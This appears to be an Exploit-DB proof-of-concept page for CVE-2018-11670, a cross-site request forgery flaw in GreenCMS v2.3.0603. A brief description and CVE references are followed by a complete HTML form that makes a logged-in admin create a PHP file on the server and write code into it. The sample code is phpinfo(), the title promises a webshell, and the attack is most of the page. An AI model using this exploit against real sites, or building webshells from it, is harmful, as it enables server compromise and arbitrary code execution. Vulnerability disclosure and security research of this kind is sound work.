PageRenderTime 49ms CodeModel.GetById 25ms RepoModel.GetById 1ms app.codeStats 0ms

/exploits/php/webapps/44825.html

https://bitbucket.org/DinoRex99/exploit-database
HTML | 33 lines | 29 code | 4 blank | 0 comment | 0 complexity | 3d0be4a6356d8e364534806b6fe71084 MD5 | raw file
Possible License(s): GPL-2.0
  1. # Exploit Title: GreenCMS v2.3.0603 CSRF vulnerability get webshell
  2. # Date: 2018-06-02
  3. # Exploit Author: xichao
  4. # Vendor Homepage: https://github.com/GreenCMS/GreenCMS
  5. # Software Link: https://github.com/GreenCMS/GreenCMS
  6. # Version: v2.3.0603
  7. # CVE : CVE-2018-11670
  8. An issue was discovered in GreenCMS v2.3.0603. There is a CSRF vulnerability that
  9. allows attackers to execute arbitrary PHP code via the content parameter to index.php?m=admin&c=media&a=fileconnect.
  10. poc:
  11. <span style="font-size:18px;"><!DOCTYPE html>
  12. <html lang="en">
  13. <head>
  14. <meta charset="UTF-8">
  15. <title>csrftest</title>
  16. </head>
  17. <form action="http://127.0.0.1//14/index.php?m=admin&c=media&a=fileconnect" method="POST" id="transfer" name="transfer">
  18. <script src="http://127.0.0.1/14/index.php?m=admin&c=media&a=fileconnect&cmd=mkfile&name=xc.php&target=l1_XA&_=1527839615462"></script>
  19. <input type="hidden" name="cmd" value="put">
  20. <input type="hidden" name="target" value="l1_eGMucGhw">
  21.   <input type="hidden" name="content" value="<?php phpinfo();?>">
  22. <button type="submit" value="Submit">WebShell</button>
  23. </form>
  24. </body>
  25. </html></span>
  26. References:
  27. http://www.iwantacve.cn/index.php/archives/38/
  28. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11670
  29. https://github.com/GreenCMS/GreenCMS/issues/108